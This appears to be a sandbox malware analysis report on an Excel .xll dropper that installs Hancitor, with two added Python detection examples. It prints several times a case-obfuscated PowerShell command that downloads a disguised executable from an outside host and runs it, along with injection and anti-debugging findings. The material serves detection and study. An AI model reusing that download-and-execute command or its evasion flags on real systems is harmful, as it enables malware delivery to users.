        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: the eight memory dumps listed below, type: MEMORY; Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
            00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp
            00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp
            00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp
            00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp
            00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp
            00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp
            00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp
            00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp
        Source: classification engine; Classification label: mal100.troj.expl.evad.winXLL@10/11@4/4
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
        Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.dat
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 occurrences)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
        Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
        Source: C:\Users\Public\snd32sys.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
        Source: 0708_5355150121.xll; Virustotal: Detection: 23%
        Source: 0708_5355150121.xll; ReversingLabs: Detection: 17%
        Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        Source: C:\Windows\SysWOW64\mshta.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Execution chain: the 32-bit EXCEL.EXE (hence the SysWOW64 binaries) loads the .xll, which launches mshta.exe on the dropped C:\Users\Public\res32.hta. The HTA starts PowerShell with a case-randomised command line whose first argument is again poWerSHEll.eXE; PowerShell treats a leading non-switch argument as the command to run, so the outer instance spawns the second powershell.exe with the same arguments minus the trailing sTart, waits for it, and then runs sTart itself. Expanded, -EX bYpASs is -ExecutionPolicy Bypass, -NOp is -NoProfile, -w 1 is -WindowStyle Hidden, WGeT is the built-in alias for Invoke-WebRequest and sTart the alias for Start-Process. The payload URL ends in .jpg but the response is written as c:\Users\Public\snd32sys.exe and executed, which is what the "downloads files with wrong headers with respect to MIME Content-Type" and "drops PE files to the user root directory" findings refer to; snd32sys.exe is the Hancitor sample unpacked in the Data Obfuscation block below.
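The command lines in the process tree above, as an added detection example that is not part of the report: Python that tokenises a PowerShell command line, flags keywords spelled in randomised case (the idea behind the PowerShell_Case_Anomaly rule the memory scan matched, re-implemented here rather than that rule itself), and flags an image-extension URL being written to an executable path and then started under an mshta.exe parent. The events are constructed from the report's process tree plus one constructed benign invocation for contrast; the keyword list, extension lists and flag names are this example's own choices.

```python
import re

# Canonical spellings of the PowerShell tokens this check cares about. A token that matches
# one of them case-insensitively but is written in neither lower-case, UPPER-CASE nor the
# canonical form is treated as case-randomised. This re-implements the idea behind the
# PowerShell_Case_Anomaly YARA rule the report matched; it is not that rule.
CANONICAL = ["PowerShell.exe", "PowerShell", "Bypass", "-Ex", "-Ep", "-ExecutionPolicy",
             "-NoP", "-NoProfile", "-W", "-WindowStyle", "Hidden", "wget", "curl", "iwr",
             "Invoke-WebRequest", "iex", "Invoke-Expression", "-OutFile", "Start",
             "Start-Process"]
ALLOWED = {c.lower(): {c, c.lower(), c.upper()} for c in CANONICAL}

IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
EXEC_EXT = (".exe", ".dll", ".scr", ".xll", ".hta", ".ps1", ".bat", ".cmd", ".js", ".vbs")

# Constructed process-creation events. The first two mirror the report's process tree
# (mshta.exe -> powershell.exe -> powershell.exe); the third is a constructed benign run.
EVENTS = [
    {"parent": r"C:\Windows\SysWOW64\mshta.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE "
                r"-EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' "
                r"-OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'"},
    {"parent": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp "
                r"-w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
]


def tokenize(cmdline):
    """Split on whitespace but keep quoted spans together, then strip the quotes.
    Backslashes are ordinary characters here (shlex in POSIX mode would eat them)."""
    return [t.strip("'\"").strip() for t in re.findall(r'''"[^"]*"|'[^']*'|\S+''', cmdline)]


def case_anomalies(tokens):
    """Tokens that match a known keyword only when case is ignored."""
    found = []
    for tok in tokens:
        name = tok.rsplit("\\", 1)[-1]            # quoted paths: judge the file name only
        allowed = ALLOWED.get(name.lower())
        if allowed is not None and name not in allowed:
            found.append(tok)
    return found


def analyse(event):
    """Return (case_anomalies, flags) for one process-creation event."""
    tokens = tokenize(event["cmdline"])
    low = [t.lower() for t in tokens]
    flags = set()
    if event["parent"].lower().endswith("\\mshta.exe"):
        flags.add("mshta_parent")                 # Office -> mshta -> powershell lineage
    url = outfile = started = None
    for i, t in enumerate(low):
        nxt = low[i + 1] if i + 1 < len(low) else ""
        if t.startswith(("http://", "https://")):
            url = t
        elif t == "-outfile":
            outfile = nxt
        elif t in ("start", "start-process", "saps"):
            started = nxt
        elif t in ("-ex", "-ep", "-executionpolicy") and nxt == "bypass":
            flags.add("execution_policy_bypass")
        elif t in ("-w", "-windowstyle") and nxt in ("1", "hidden"):
            flags.add("hidden_window")
    if url and outfile:
        path = url.split("?", 1)[0]
        if path.endswith(IMAGE_EXT) and outfile.endswith(EXEC_EXT):
            flags.add("image_url_written_as_executable")   # .jpg URL, .exe on disk
    if started and started == outfile:
        flags.add("executes_downloaded_file")
    anomalies = case_anomalies(tokens)
    if anomalies:
        flags.add("case_randomised_keywords")
    return anomalies, flags


if __name__ == "__main__":
    for ev in EVENTS:
        anomalies, flags = analyse(ev)
        print(ev["parent"].rsplit("\\", 1)[-1], "->", ev["image"].rsplit("\\", 1)[-1])
        print("  case anomalies:", anomalies)
        print("  flags:", sorted(flags))
```

The case check is deliberately strict about spelling (lower, UPPER or canonical only) so that ordinary camel-cased cmdlets pass while random-cased ones like WGeT and -OuTfIle do not; the parent check and the image-to-executable check are independent of it, so a downloader that avoids case games is still caught by the other two.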
        Source: C:\Windows\SysWOW64\mshta.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: Window Recorder; Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb; source: snd32sys.exe, snd32sys.exe.6.dr

        Data Obfuscation:

        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\Public\snd32sys.exe; Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: initial sample; Static PE information: section where entry point is pointing to: .img
        Source: 0708_5355150121.xll; Static PE information: section name: .img
        Source: 0708_5355150121.xll; Static PE information: section name: .ico
        Source: 0708_5355150121.xll; Static PE information: section name: .fyjrtr
        Source: 0708_5355150121.xll; Static PE information: section name: .rytkrer
        Source: 0708_5355150121.xll; Static PE information: section name: .reyery
        Source: 0708_5355150121.xll; Static PE information: section name: .txt
        Source: 0708_5355150121.xll; Static PE information: section name: .res
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_04B212A1 push es; ret
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_0062B28D push ecx; ret
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_0062034A push 8BFFFFFFh; ret
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_006208AD push 8BFFFFFFh; ret
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_0062BBE6 push ecx; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\snd32sys.exe (dropped file, 2 occurrences)
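The static PE findings above (entry point in .img, section names .img, .ico, .fyjrtr, .rytkrer, .reyery, .txt, .res), as an added example that is not part of the report: a dependency-free walk of the PE headers that locates the section containing AddressOfEntryPoint and lists section names outside a conventional set, i.e. the two checks behind "entry point lies outside standard sections" and the odd section names. The sample images are constructed in the code (headers only, empty section bodies), one with the .xll's section names and entry in .img and one conventional; the list of standard names is a heuristic of this example.

```python
import struct

# Heuristic lists for this example. Section names are attacker-controlled, so a match here is
# a triage signal, not proof of anything.
CODE_SECTIONS = {".text", "CODE", ".code", "INIT", ".textbss"}
STANDARD_SECTIONS = CODE_SECTIONS | {".rdata", ".data", ".idata", ".edata", ".pdata",
                                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT", "DATA",
                                     "BSS", ".ndata", ".didat"}

# Section layouts constructed for the demo: the first is the .xll's as reported above.
ODD_SECTIONS = [".img", ".ico", ".fyjrtr", ".rytkrer", ".reyery", ".txt", ".res"]
CONVENTIONAL_SECTIONS = [".text", ".rdata", ".data", ".rsrc"]


def parse_sections(pe):
    """Return (entry_rva, [(name, virtual_address, size)]) from PE32 or PE32+ bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)   # same offset in PE32 and PE32+
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize = struct.unpack_from("<III", pe, off + 8)
        sections.append((name, va, max(vsize, rawsize)))
    return entry_rva, sections


def analyse_pe(pe):
    """Which section holds the entry point, and which section names look non-standard."""
    entry_rva, sections = parse_sections(pe)
    entry_section = next((n for n, va, size in sections if va <= entry_rva < va + size), None)
    return {
        "entry_rva": entry_rva,
        "entry_section": entry_section,
        "entry_in_code_section": entry_section in CODE_SECTIONS,
        "non_standard_sections": [n for n, _, _ in sections if n not in STANDARD_SECTIONS],
    }


def build_pe(section_names, entry_section):
    """Constructed minimal PE32 (i386, empty sections) used only to exercise the parser."""
    n = len(section_names)
    raw_base = (0x80 + 4 + 20 + 0xE0 + 40 * n + 0x1FF) & ~0x1FF   # 512-byte file alignment
    hdr = bytearray(raw_base)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                         # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x84, 0x14C, n, 0, 0, 0, 0xE0, 0x0102)
    opt = 0x84 + 20
    struct.pack_into("<H", hdr, opt, 0x10B)                         # PE32 magic
    for i, name in enumerate(section_names):
        va = 0x1000 * (i + 1)
        if name == entry_section:
            struct.pack_into("<I", hdr, opt + 16, va + 0x10)        # AddressOfEntryPoint
        off = opt + 0xE0 + 40 * i
        hdr[off:off + 8] = name.encode("latin-1").ljust(8, b"\0")
        struct.pack_into("<IIII", hdr, off + 8, 0x1000, va, 0x200, raw_base + 0x200 * i)
    return bytes(hdr) + b"\0" * (0x200 * n)


if __name__ == "__main__":
    for label, names, entry in (("xll-like", ODD_SECTIONS, ".img"),
                                ("conventional", CONVENTIONAL_SECTIONS, ".text")):
        print(label, analyse_pe(build_pe(names, entry)))
```

On a real file call analyse_pe(open(path, "rb").read()); the parser reads only the fields it needs, so a truncated or deliberately malformed header raises rather than being silently accepted.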

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\Public\snd32sys.exe (dropped file)
        Source: C:\Users\Public\snd32sys.exe; Code function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (4 occurrences)
        Source: C:\Windows\SysWOW64\mshta.exe; Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (194 occurrences)
        NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag of SetErrorMode, which suppresses the dialog Windows would otherwise show when a module fails to load. Office and the .NET-hosted PowerShell set it routinely, as the counts above show, and none of these calls come from snd32sys.exe, so on its own this indicator carries little weight.
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1888
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3141
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 673
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1800
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1157
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964 | Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 | Thread sleep count: 1800 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 | Thread sleep count: 1157 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884 | Thread sleep count: 43 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920 | Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep count: 46 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -2760000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep count: 45 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -2700000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -60000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe | Last function: Thread delayed
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657FD2 FindFirstFileExW,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,
        Source: C:\Users\Public\snd32sys.exe | Thread delayed: delay time: 60000
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | Binary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657943 IsDebuggerPresent,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006B138F push dword ptr fs:[00000030h]
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062BAF2 SetUnhandledExceptionFilter,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        Contains functionality to inject threads in other processes
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,
        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Program Manager
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Progman
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062BBFB cpuid
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW,
        Source: C:\Users\Public\snd32sys.exe | Code function: ___crtGetLocaleInfoEx,
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
        Source: C:\Users\Public\snd32sys.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
        Source: C:\Users\Public\snd32sys.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
